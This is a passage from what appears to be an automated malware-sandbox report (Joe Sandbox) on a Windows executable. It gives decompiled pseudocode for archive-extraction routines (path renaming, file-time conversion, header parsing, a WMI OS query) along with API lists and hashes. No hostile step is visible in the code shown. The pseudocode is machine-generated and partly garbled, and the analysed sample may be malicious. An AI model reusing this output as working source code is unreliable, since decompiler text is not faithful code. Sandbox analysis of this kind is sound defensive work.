                                                    							} else {
                                                    								goto L20;
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t70 = 0;
                                                    				}
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t162 - 0xc));
                                                    				return _t70;
                                                    			}


                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                    • API String ID: 3519838083-3505469590
                                                    • Opcode ID: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                    • Instruction ID: 01b7350b5a9d95961e40c0feb5bf08f966433e03c56ed3b577a8b6b96dd08e62
                                                    • Opcode Fuzzy Hash: a3aaa0be0d501fb7b7e20a7f28bffa99cc909c3451aa889f7e5f5bdbe6a8fb10
                                                    • Instruction Fuzzy Hash: D2715D71A00619AFDB14DFA5CC99EBEBBB9FF48714B14015DE512A72A0CB30AE41CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E00CC9382() {
                                                    				void* _t32;
                                                    				short _t33;
                                                    				long _t35;
                                                    				void* _t40;
                                                    				short _t42;
                                                    				void* _t66;
                                                    				intOrPtr _t69;
                                                    				void* _t76;
                                                    				intOrPtr _t79;
                                                    				void* _t81;
                                                    				WCHAR* _t82;
                                                    				void* _t84;
                                                    				void* _t86;
                                                    
                                                    				E00CDEB78(0xcf28b1, _t84);
                                                    				E00CDEC50(0x503c);
                                                    				_t82 =  *(_t84 + 8);
                                                    				_t32 = _t84 - 0x4048;
                                                    				__imp__GetLongPathNameW(_t82, _t32, 0x800, _t76, _t81, _t66);
                                                    				if(_t32 == 0 || _t32 >= 0x800) {
                                                    					L20:
                                                    					_t33 = 0;
                                                    					__eflags = 0;
                                                    				} else {
                                                    					_t35 = GetShortPathNameW(_t82, _t84 - 0x5048, 0x800);
                                                    					if(_t35 == 0) {
                                                    						goto L20;
                                                    					} else {
                                                    						_t91 = _t35 - 0x800;
                                                    						if(_t35 >= 0x800) {
                                                    							goto L20;
                                                    						} else {
                                                    							 *((intOrPtr*)(_t84 - 0x10)) = E00CCC29A(_t91, _t84 - 0x4048);
                                                    							_t78 = E00CCC29A(_t91, _t84 - 0x5048);
                                                    							_t69 = 0;
                                                    							if( *_t39 == 0) {
                                                    								goto L20;
                                                    							} else {
                                                    								_t40 = E00CD1FBB( *((intOrPtr*)(_t84 - 0x10)), _t78);
                                                    								_t93 = _t40;
                                                    								if(_t40 == 0) {
                                                    									goto L20;
                                                    								} else {
                                                    									_t42 = E00CD1FBB(E00CCC29A(_t93, _t82), _t78);
                                                    									if(_t42 != 0) {
                                                    										goto L20;
                                                    									} else {
                                                    										 *(_t84 - 0x1010) = _t42;
                                                    										_t79 = 0;
                                                    										while(1) {
                                                    											_t95 = _t42;
                                                    											if(_t42 != 0) {
                                                    												break;
                                                    											}
                                                    											E00CD0602(_t84 - 0x1010, _t82, 0x800);
                                                    											E00CC4092(E00CCC29A(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
                                                    											_t86 = _t86 + 0x10;
                                                    											if(E00CCA231(_t84 - 0x1010) == 0) {
                                                    												_t42 =  *(_t84 - 0x1010);
                                                    											} else {
                                                    												_t42 = 0;
                                                    												 *(_t84 - 0x1010) = 0;
                                                    											}
                                                    											_t79 = _t79 + 0x7b;
                                                    											if(_t79 < 0x2710) {
                                                    												continue;
                                                    											} else {
                                                    												_t98 = _t42;
                                                    												if(_t42 == 0) {
                                                    													goto L20;
                                                    												} else {
                                                    													break;
                                                    												}
                                                    											}
                                                    											goto L21;
                                                    										}
                                                    										E00CD0602(_t84 - 0x3048, _t82, 0x800);
                                                    										_push(0x800);
                                                    										E00CCC310(_t98, _t84 - 0x3048,  *((intOrPtr*)(_t84 - 0x10)));
                                                    										if(MoveFileW(_t84 - 0x3048, _t84 - 0x1010) == 0) {
                                                    											goto L20;
                                                    										} else {
                                                    											E00CC9556(_t84 - 0x2048);
                                                    											 *((intOrPtr*)(_t84 - 4)) = _t69;
                                                    											if(E00CCA231(_t82) == 0) {
                                                    												_t69 = E00CC966E(_t84 - 0x2048, _t82, 0x12);
                                                    											}
                                                    											MoveFileW(_t84 - 0x1010, _t84 - 0x3048);
                                                    											if(_t69 != 0) {
                                                    												E00CC9620(_t84 - 0x2048);
                                                    												E00CC974E(_t84 - 0x2048);
                                                    											}
                                                    											E00CC959A(_t84 - 0x2048);
                                                    											_t33 = 1;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				L21:
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
                                                    				return _t33;
                                                    			}

















                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC9387
                                                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CC93AA
                                                    • GetShortPathNameW.KERNEL32 ref: 00CC93C9
                                                      • Part of subcall function 00CCC29A: _wcslen.LIBCMT ref: 00CCC2A2
                                                      • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                    • _swprintf.LIBCMT ref: 00CC9465
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CC94D4
                                                    • MoveFileW.KERNEL32(?,?), ref: 00CC9514
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                    • String ID: rtmp%d
                                                    • API String ID: 3726343395-3303766350
                                                    • Opcode ID: 8f6e62e2e90f0bc5a4f0515021fd1356cd66d802ad0d66964f4554935848f1ec
                                                    • Instruction ID: 11261bda344177604be83e9edff758fa901511ead7602192c3cf0be925ba0a13
                                                    • Opcode Fuzzy Hash: 8f6e62e2e90f0bc5a4f0515021fd1356cd66d802ad0d66964f4554935848f1ec
                                                    • Instruction Fuzzy Hash: C14156B190025866DF21FBA0CC49FEE737CEF45340F0449A9F659E3551DA388B89EB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00CD1218(intOrPtr* __ecx, long __edx, void* __ebp, void* __eflags, signed int* _a4) {
                                                    				struct _SYSTEMTIME _v16;
                                                    				struct _SYSTEMTIME _v32;
                                                    				struct _SYSTEMTIME _v48;
                                                    				struct _FILETIME _v56;
                                                    				struct _FILETIME _v64;
                                                    				intOrPtr* _v68;
                                                    				struct _FILETIME _v76;
                                                    				intOrPtr _v80;
                                                    				signed int _t78;
                                                    				long _t82;
                                                    				signed int _t87;
                                                    				signed int _t92;
                                                    				void* _t93;
                                                    				long _t94;
                                                    				signed int _t96;
                                                    				intOrPtr* _t97;
                                                    				intOrPtr* _t98;
                                                    				signed int* _t99;
                                                    				void* _t100;
                                                    				signed int _t101;
                                                    
                                                    				_t100 = __ebp;
                                                    				_t94 = __edx;
                                                    				_t97 = __ecx;
                                                    				_v68 = __ecx;
                                                    				_v80 = E00CDF1E0( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
                                                    				_v76.dwLowDateTime = _t94;
                                                    				if(E00CCB146() >= 0x600) {
                                                    					FileTimeToSystemTime( &_v64,  &_v32);
                                                    					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
                                                    					SystemTimeToFileTime( &_v16,  &_v76);
                                                    					SystemTimeToFileTime( &_v32,  &_v56);
                                                    					asm("sbb ecx, [esp+0x24]");
                                                    					asm("sbb ecx, ebx");
                                                    					asm("adc ecx, ebx");
                                                    					_v76.dwLowDateTime = 0 - _v56.dwLowDateTime + _v76.dwLowDateTime + _v64.dwLowDateTime;
                                                    					asm("adc ecx, ebx");
                                                    					_v76.dwHighDateTime = _v76.dwHighDateTime + _v64.dwHighDateTime;
                                                    				} else {
                                                    					FileTimeToLocalFileTime( &_v64,  &_v76);
                                                    				}
                                                    				_push(_t100);
                                                    				FileTimeToSystemTime( &_v76,  &_v48);
                                                    				_t99 = _a4;
                                                    				_t92 = _v48.wDay & 0x0000ffff;
                                                    				_t101 = _v48.wMonth & 0x0000ffff;
                                                    				_t95 = _v48.wYear & 0x0000ffff;
                                                    				_t99[3] = _v48.wHour & 0x0000ffff;
                                                    				_t87 = _t92 - 1;
                                                    				_t99[4] = _v48.wMinute & 0x0000ffff;
                                                    				_t99[5] = _v48.wSecond & 0x0000ffff;
                                                    				_t99[7] = _v48.wDayOfWeek & 0x0000ffff;
                                                    				 *_t99 = _v48.wYear & 0x0000ffff;
                                                    				_t99[1] = _t101;
                                                    				_t99[2] = _t92;
                                                    				_t99[8] = _t87;
                                                    				_v76.dwLowDateTime = 1;
                                                    				if(_t101 > 1) {
                                                    					_t96 = _t87;
                                                    					_t98 = 0xcfe1a8;
                                                    					_t93 = 4;
                                                    					while(1) {
                                                    						_t87 = _t96;
                                                    						if(_t93 > 0x30) {
                                                    							break;
                                                    						}
                                                    						_t93 = _t93 + 4;
                                                    						_t87 =  *_t98 + _t96;
                                                    						_t82 = _v76.dwLowDateTime + 1;
                                                    						_t99[8] = _t87;
                                                    						_t98 = _t98 + 4;
                                                    						_v76.dwLowDateTime = _t82;
                                                    						_t96 = _t87;
                                                    						if(_t82 < _t101) {
                                                    							continue;
                                                    						}
                                                    						break;
                                                    					}
                                                    					_t97 = _v68;
                                                    					_t95 = _v48.wYear & 0x0000ffff;
                                                    				}
                                                    				if(_t101 > 2 && E00CD13A4(_t95) != 0) {
                                                    					_t99[8] = _t87 + 1;
                                                    				}
                                                    				_t78 = E00CDF250( *_t97,  *((intOrPtr*)(_t97 + 4)), 0x3b9aca00, 0);
                                                    				_t99[6] = _t78;
                                                    				return _t78;
                                                    			}
























                                                    APIs
                                                    • __aulldiv.LIBCMT ref: 00CD122E
                                                      • Part of subcall function 00CCB146: GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                    • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CD1251
                                                    • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CD1263
                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CD1274
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1284
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CD1294
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CD12CF
                                                    • __aullrem.LIBCMT ref: 00CD1379
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                    • String ID:
                                                    • API String ID: 1247370737-0
                                                    • Opcode ID: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                    • Instruction ID: 3af096e8fa9b8c7c418f5ad2374f8de2ab11cfc964b4419aa5790d9614b02da0
                                                    • Opcode Fuzzy Hash: 6a59a9fbe35db9dab02c4225d7442a7e34a9fbbeebc5fcfde6a9a8f0d4c7541e
                                                    • Instruction Fuzzy Hash: 2341FAB1508345AFC710DF65C884A6FBBE9FF88714F04892EF996C2610E734E649DB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CC2210(intOrPtr __ecx, signed int __edx, signed char _a3, signed char _a4, signed int _a5, signed int _a6, signed int _a7, signed char _a8, intOrPtr _a12, signed char _a16, intOrPtr _a20, char _a28, char _a36, char _a48, char _a52, char _a160, char _a172, intOrPtr _a8368, intOrPtr _a8372, intOrPtr _a8376) {
                                                    				char _v4;
                                                    				signed char _v5;
                                                    				char _v12;
                                                    				char _v16;
                                                    				signed char _t135;
                                                    				char _t138;
                                                    				signed int _t140;
                                                    				unsigned int _t141;
                                                    				signed int _t145;
                                                    				signed int _t162;
                                                    				signed int _t165;
                                                    				signed int _t176;
                                                    				signed char _t179;
                                                    				signed char _t180;
                                                    				signed char _t181;
                                                    				signed int _t183;
                                                    				signed int _t186;
                                                    				signed int _t188;
                                                    				signed int _t189;
                                                    				signed char _t221;
                                                    				signed char _t234;
                                                    				signed int _t235;
                                                    				signed int _t237;
                                                    				intOrPtr _t240;
                                                    				signed char _t244;
                                                    				intOrPtr _t247;
                                                    				signed char _t248;
                                                    				signed char _t263;
                                                    				signed int _t264;
                                                    				signed int _t266;
                                                    				intOrPtr _t273;
                                                    				intOrPtr _t276;
                                                    				intOrPtr _t279;
                                                    				intOrPtr _t306;
                                                    				intOrPtr _t311;
                                                    				signed int _t313;
                                                    				intOrPtr _t315;
                                                    				signed char _t318;
                                                    				char _t319;
                                                    				void* _t320;
                                                    				void* _t321;
                                                    				void* _t322;
                                                    				void* _t323;
                                                    				void* _t324;
                                                    				void* _t325;
                                                    				void* _t326;
                                                    				void* _t327;
                                                    				void* _t328;
                                                    				void* _t329;
                                                    				void* _t330;
                                                    				void* _t331;
                                                    				void* _t332;
                                                    				intOrPtr* _t334;
                                                    				signed int _t337;
                                                    				signed int _t338;
                                                    				intOrPtr _t340;
                                                    				void* _t341;
                                                    				signed int _t345;
                                                    				signed int _t348;
                                                    				signed int _t361;
                                                    
                                                    				_t313 = __edx;
                                                    				E00CDEC50(0x20ac);
                                                    				_t315 = _a8368;
                                                    				_a12 = __ecx;
                                                    				_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _a8372;
                                                    				if(_t135 <  *(_t315 + 0x1c)) {
                                                    					L96:
                                                    					return _t135;
                                                    				}
                                                    				 *(_t315 + 0x1c) = _t135;
                                                    				if(_a8372 >= 2) {
                                                    					_t240 = _a8376;
                                                    					while(1) {
                                                    						_t135 = E00CCCCFB();
                                                    						_t244 = _t135;
                                                    						_t345 = _t313;
                                                    						if(_t345 < 0 || _t345 <= 0 && _t244 == 0) {
                                                    							break;
                                                    						}
                                                    						_t318 =  *(_t315 + 0x1c);
                                                    						_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t318;
                                                    						if(_t135 == 0) {
                                                    							break;
                                                    						}
                                                    						_t348 = _t313;
                                                    						if(_t348 > 0 || _t348 >= 0 && _t244 > _t135) {
                                                    							break;
                                                    						} else {
                                                    							_a8 = _t318 + _t244;
                                                    							_t138 = E00CCCCFB();
                                                    							_t337 = _t313;
                                                    							_t319 = _t138;
                                                    							_t313 = _a8;
                                                    							_t247 = _t313 -  *(_t315 + 0x1c);
                                                    							_a20 = _t247;
                                                    							if( *((intOrPtr*)(_t240 + 4)) == 1 && _t319 == 1 && _t337 == 0) {
                                                    								 *((char*)(_t240 + 0x1e)) = _t138;
                                                    								_t234 = E00CCCCFB();
                                                    								_a16 = _t234;
                                                    								if((_t234 & 0x00000001) != 0) {
                                                    									_t237 = E00CCCCFB();
                                                    									if((_t237 | _t313) != 0) {
                                                    										_t311 = _a12;
                                                    										asm("adc ecx, edx");
                                                    										 *((intOrPtr*)(_t240 + 0x20)) = _t237 +  *((intOrPtr*)(_t311 + 0x6cb8));
                                                    										 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)(_t311 + 0x6cbc));
                                                    									}
                                                    									_t234 = _a16;
                                                    								}
                                                    								if((_t234 & 0x00000002) != 0) {
                                                    									_t235 = E00CCCCFB();
                                                    									if((_t235 | _t313) != 0) {
                                                    										_t306 = _a12;
                                                    										asm("adc ecx, edx");
                                                    										 *((intOrPtr*)(_t240 + 0x30)) = _t235 +  *((intOrPtr*)(_t306 + 0x6cb8));
                                                    										 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)(_t306 + 0x6cbc));
                                                    									}
                                                    								}
                                                    								_t247 = _a20;
                                                    								_t313 = _a8;
                                                    							}
                                                    							if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
                                                    								_t361 = _t337;
                                                    								if(_t361 > 0 || _t361 >= 0 && _t319 > 7) {
                                                    									goto L94;
                                                    								} else {
                                                    									_t320 = _t319 - 1;
                                                    									if(_t320 == 0) {
                                                    										_t140 = E00CCCCFB();
                                                    										__eflags = _t140;
                                                    										if(_t140 == 0) {
                                                    											_t141 = E00CCCCFB();
                                                    											 *(_t240 + 0x10c1) = _t141 & 0x00000001;
                                                    											 *(_t240 + 0x10ca) = _t141 >> 0x00000001 & 0x00000001;
                                                    											_t145 = E00CCCBAF(_t315) & 0x000000ff;
                                                    											 *(_t240 + 0x10ec) = _t145;
                                                    											__eflags = _t145 - 0x18;
                                                    											if(_t145 > 0x18) {
                                                    												E00CC4092( &_a28, 0x14, L"xc%u", _t145);
                                                    												_t341 = _t341 + 0x10;
                                                    												E00CC403D(_a12, _t240 + 0x28,  &_a28);
                                                    											}
                                                    											E00CCCC5D(_t315, _t240 + 0x10a1, 0x10);
                                                    											E00CCCC5D(_t315, _t240 + 0x10b1, 0x10);
                                                    											__eflags =  *(_t240 + 0x10c1);
                                                    											if( *(_t240 + 0x10c1) != 0) {
                                                    												_t321 = _t240 + 0x10c2;
                                                    												E00CCCC5D(_t315, _t321, 8);
                                                    												E00CCCC5D(_t315,  &_a16, 4);
                                                    												E00CD0016( &_a52);
                                                    												_push(8);
                                                    												_push(_t321);
                                                    												_push( &_a48);
                                                    												E00CD005C();
                                                    												_push( &_v4);
                                                    												E00CCFF33( &_a36);
                                                    												_t162 = E00CE0C4A( &_v16,  &_v12, 4);
                                                    												_t341 = _t341 + 0xc;
                                                    												asm("sbb al, al");
                                                    												__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
                                                    												 *(_t240 + 0x10c1) =  ~_t162 + 1;
                                                    												if( *((intOrPtr*)(_t240 + 4)) == 3) {
                                                    													_t165 = E00CE0C4A(_t321, 0xcf36a8, 8);
                                                    													_t341 = _t341 + 0xc;
                                                    													__eflags = _t165;
                                                    													if(_t165 == 0) {
                                                    														 *(_t240 + 0x10c1) = _t165;
                                                    													}
                                                    												}
                                                    											}
                                                    											 *((char*)(_t240 + 0x10a0)) = 1;
                                                    											 *((intOrPtr*)(_t240 + 0x109c)) = 5;
                                                    											 *((char*)(_t240 + 0x109b)) = 1;
                                                    										} else {
                                                    											E00CC4092( &_a28, 0x14, L"x%u", _t140);
                                                    											_t341 = _t341 + 0x10;
                                                    											E00CC403D(_a12, _t240 + 0x28,  &_a28);
                                                    										}
                                                    										goto L94;
                                                    									}
                                                    									_t322 = _t320 - 1;
                                                    									if(_t322 == 0) {
                                                    										_t176 = E00CCCCFB();
                                                    										__eflags = _t176;
                                                    										if(_t176 != 0) {
                                                    											goto L94;
                                                    										}
                                                    										_push(0x20);
                                                    										 *((intOrPtr*)(_t240 + 0x1070)) = 3;
                                                    										_push(_t240 + 0x1074);
                                                    										L37:
                                                    										E00CCCC5D(_t315);
                                                    										goto L94;
                                                    									}
                                                    									_t323 = _t322 - 1;
                                                    									if(_t323 == 0) {
                                                    										__eflags = _t247 - 5;
                                                    										if(_t247 < 5) {
                                                    											goto L94;
                                                    										}
                                                    										_t179 = E00CCCCFB();
                                                    										_a3 = _t179;
                                                    										_t180 = _t179 & 0x00000001;
                                                    										_t263 = _a3;
                                                    										_a4 = _t180;
                                                    										_t313 = _t263 & 0x00000002;
                                                    										__eflags = _t313;
                                                    										_a5 = _t313;
                                                    										if(_t313 != 0) {
                                                    											_t279 = _t315;
                                                    											__eflags = _t180;
                                                    											if(__eflags == 0) {
                                                    												E00CD15BB(_t240 + 0x1040, E00CCCC3D(_t279, __eflags), _t313);
                                                    											} else {
                                                    												E00CD158F(_t240 + 0x1040, E00CCCBFB(_t279), 0);
                                                    											}
                                                    											_t263 = _a3;
                                                    											_t180 = _a4;
                                                    										}
                                                    										_t264 = _t263 & 0x00000004;
                                                    										__eflags = _t264;
                                                    										_a6 = _t264;
                                                    										if(_t264 != 0) {
                                                    											_t326 = _t240 + 0x1048;
                                                    											_t276 = _t315;
                                                    											__eflags = _t180;
                                                    											if(__eflags == 0) {
                                                    												E00CD15BB(_t326, E00CCCC3D(_t276, __eflags), _t313);
                                                    											} else {
                                                    												E00CD158F(_t326, E00CCCBFB(_t276), 0);
                                                    											}
                                                    										}
                                                    										_t181 = _a3;
                                                    										_t266 = _t181 & 0x00000008;
                                                    										__eflags = _t266;
                                                    										_a7 = _t266;
                                                    										if(_t266 == 0) {
                                                    											__eflags = _a4;
                                                    											if(_a4 == 0) {
                                                    												goto L94;
                                                    											}
                                                    											goto L72;
                                                    										} else {
                                                    											__eflags = _a4;
                                                    											_t325 = _t240 + 0x1050;
                                                    											_t273 = _t315;
                                                    											if(__eflags == 0) {
                                                    												E00CD15BB(_t325, E00CCCC3D(_t273, __eflags), _t313);
                                                    												goto L94;
                                                    											}
                                                    											E00CD158F(_t325, E00CCCBFB(_t273), 0);
                                                    											_t181 = _v5;
                                                    											L72:
                                                    											__eflags = _t181 & 0x00000010;
                                                    											if((_t181 & 0x00000010) != 0) {
                                                    												__eflags = _a5;
                                                    												if(_a5 == 0) {
                                                    													_t338 = 0x3fffffff;
                                                    													_t324 = 0x3b9aca00;
                                                    												} else {
                                                    													_t188 = E00CCCBFB(_t315);
                                                    													_t338 = 0x3fffffff;
                                                    													_t324 = 0x3b9aca00;
                                                    													_t189 = _t188 & 0x3fffffff;
                                                    													__eflags = _t189 - 0x3b9aca00;
                                                    													if(_t189 < 0x3b9aca00) {
                                                    														E00CD1208(_t240 + 0x1040, _t189, 0);
                                                    													}
                                                    												}
                                                    												__eflags = _a6;
                                                    												if(_a6 != 0) {
                                                    													_t186 = E00CCCBFB(_t315) & _t338;
                                                    													__eflags = _t186 - _t324;
                                                    													if(_t186 < _t324) {
                                                    														E00CD1208(_t240 + 0x1048, _t186, 0);
                                                    													}
                                                    												}
                                                    												__eflags = _a7;
                                                    												if(_a7 != 0) {
                                                    													_t183 = E00CCCBFB(_t315) & _t338;
                                                    													__eflags = _t183 - _t324;
                                                    													if(_t183 < _t324) {
                                                    														E00CD1208(_t240 + 0x1050, _t183, 0);
                                                    													}
                                                    												}
                                                    											}
                                                    											goto L94;
                                                    										}
                                                    									}
                                                    									_t327 = _t323 - 1;
                                                    									if(_t327 == 0) {
                                                    										__eflags = _t247 - 1;
                                                    										if(_t247 >= 1) {
                                                    											E00CCCCFB();
                                                    											__eflags = E00CCCCFB();
                                                    											if(__eflags != 0) {
                                                    												 *((char*)(_t240 + 0x10f3)) = 1;
                                                    												E00CC4092( &_a28, 0x14, L";%u", _t204);
                                                    												_t341 = _t341 + 0x10;
                                                    												E00CD05DA(__eflags, _t240 + 0x28,  &_a28, 0x800);
                                                    											}
                                                    										}
                                                    										goto L94;
                                                    									}
                                                    									_t328 = _t327 - 1;
                                                    									if(_t328 == 0) {
                                                    										 *((intOrPtr*)(_t240 + 0x1100)) = E00CCCCFB();
                                                    										 *(_t240 + 0x2104) = E00CCCCFB() & 0x00000001;
                                                    										_t329 = E00CCCCFB();
                                                    										_a172 = 0;
                                                    										__eflags = _t329 - 0x1fff;
                                                    										if(_t329 < 0x1fff) {
                                                    											E00CCCC5D(_t315,  &_a172, _t329);
                                                    											 *((char*)(_t341 + _t329 + 0xbc)) = 0;
                                                    										}
                                                    										E00CCC335( &_a172,  &_a172, 0x2000);
                                                    										_push(0x800);
                                                    										_push(_t240 + 0x1104);
                                                    										_push( &_a160);
                                                    										E00CD1C3B();
                                                    										goto L94;
                                                    									}
                                                    									_t330 = _t328 - 1;
                                                    									if(_t330 == 0) {
                                                    										_t221 = E00CCCCFB();
                                                    										_a16 = _t221;
                                                    										_t339 = _t240 + 0x2108;
                                                    										 *(_t240 + 0x2106) = _t221 >> 0x00000002 & 0x00000001;
                                                    										 *(_t240 + 0x2107) = _t221 >> 0x00000003 & 0x00000001;
                                                    										 *((char*)(_t240 + 0x2208)) = 0;
                                                    										 *((char*)(_t240 + 0x2108)) = 0;
                                                    										__eflags = _t221 & 0x00000001;
                                                    										if((_t221 & 0x00000001) != 0) {
                                                    											_t332 = E00CCCCFB();
                                                    											__eflags = _t332 - 0xff;
                                                    											if(_t332 >= 0xff) {
                                                    												_t332 = 0xff;
                                                    											}
                                                    											E00CCCC5D(_t315, _t339, _t332);
                                                    											_t221 = _a8;
                                                    											 *((char*)(_t332 + _t240 + 0x2108)) = 0;
                                                    										}
                                                    										__eflags = _t221 & 0x00000002;
                                                    										if((_t221 & 0x00000002) != 0) {
                                                    											_t331 = E00CCCCFB();
                                                    											__eflags = _t331 - 0xff;
                                                    											if(_t331 >= 0xff) {
                                                    												_t331 = 0xff;
                                                    											}
                                                    											E00CCCC5D(_t315, _t240 + 0x2208, _t331);
                                                    											 *((char*)(_t331 + _t240 + 0x2208)) = 0;
                                                    										}
                                                    										__eflags =  *(_t240 + 0x2106);
                                                    										if( *(_t240 + 0x2106) != 0) {
                                                    											 *((intOrPtr*)(_t240 + 0x2308)) = E00CCCCFB();
                                                    										}
                                                    										__eflags =  *(_t240 + 0x2107);
                                                    										if( *(_t240 + 0x2107) != 0) {
                                                    											 *((intOrPtr*)(_t240 + 0x230c)) = E00CCCCFB();
                                                    										}
                                                    										 *((char*)(_t240 + 0x2105)) = 1;
                                                    										goto L94;
                                                    									}
                                                    									if(_t330 != 1) {
                                                    										goto L94;
                                                    									}
                                                    									_t340 = _t247;
                                                    									if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t315 + 0x18)) - _t313 == 1) {
                                                    										_t340 = _t247 + 1;
                                                    									}
                                                    									_t334 = _t240 + 0x1028;
                                                    									E00CC20BD(_t334, _t340);
                                                    									_push(_t340);
                                                    									_push( *_t334);
                                                    									goto L37;
                                                    								}
                                                    							} else {
                                                    								L94:
                                                    								_t248 = _a8;
                                                    								 *(_t315 + 0x1c) = _t248;
                                                    								_t135 =  *((intOrPtr*)(_t315 + 0x18)) - _t248;
                                                    								if(_t135 >= 2) {
                                                    									continue;
                                                    								}
                                                    								break;
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    			}

                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CC2536
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                      • Part of subcall function 00CD05DA: _wcslen.LIBCMT ref: 00CD05E0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
